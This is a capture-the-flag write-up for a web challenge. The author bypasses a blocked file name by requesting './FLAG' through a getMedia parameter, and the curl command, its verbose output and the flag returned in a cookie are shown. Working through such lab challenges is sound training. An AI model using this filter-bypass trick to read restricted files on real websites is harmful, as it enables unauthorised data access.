READ THE FLAG
Category: Web security
100 points
Cannot we store them in a database !?
Challenge Link: https://ch2.sbug.se/
Solution
Under the challenge address there are a few words from the author ;-)
But on a closer look I realized that I had been redirected from the original address.
I investigated the redirection path, which looks like this:
https://ch2.sbug.se/
=> https://ch2.sbug.se/get?getMedia=README
=> https://ch2.sbug.se/read
The /get?getMedia=README response sets the cookie below:
< set-cookie: content="H3llo\012This is my resume.\012I am EXPERT in cyber security\012"; Path=/
which, after the redirection, is displayed under the /read address.
I played with it a bit until I found that https://ch2.sbug.se/get?getMedia=FLAG responds with the message YOU CANNOT GET A FLAG THAT EASY. That’s why I tried the request below:
curl 'https://ch2.sbug.se/get?getMedia=./FLAG' -v
* Trying 172.67.202.196:443...
* Connected to ch2.sbug.se (172.67.202.196) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
* CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
* subject: C=US; ST=California; L=San Francisco; O=Cloudflare, Inc.; CN=sni.cloudflaressl.com
* start date: Mar 8 00:00:00 2021 GMT
* expire date: Mar 7 23:59:59 2022 GMT
* subjectAltName: host "ch2.sbug.se" matched cert's "*.sbug.se"
* issuer: C=US; O=Cloudflare, Inc.; CN=Cloudflare Inc ECC CA-3
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55901e3ca560)
> GET /get?getMedia=./FLAG HTTP/2
> Host: ch2.sbug.se
> user-agent: curl/7.74.0
> accept: */*
>
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 256)!
< HTTP/2 302
< date: Tue, 20 Apr 2021 18:30:57 GMT
< content-type: text/html; charset=utf-8
< set-cookie: __cfduid=d2e8b3c0a2ee3362d38825d94d517a3d51618943457; expires=Thu, 20-May-21 18:30:57 GMT; path=/; domain=.sbug.se; HttpOnly; SameSite=Lax; Secure
< location: https://ch2.sbug.se/read
< set-cookie: content="SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}\012"; Path=/
< cf-cache-status: DYNAMIC
< cf-request-id: 099225cfc800009d127131b000000001
< expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
< report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YCgCZJN%2BAHTWNQvla1%2B0C32CkovAgJ8ByqWQwd1JYOV6uj77HqByk1adOR1Dou8j7%2BBTx5Otb%2Bms%2FoIngEhqqwfXhmSRKCTMah6reQ%3D%3D"}],"max_age":604800,"group":"cf-nel"}
< nel: {"report_to":"cf-nel","max_age":604800}
< server: cloudflare
< cf-ray: 6430725faae19d12-AMS
< alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Flag
SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}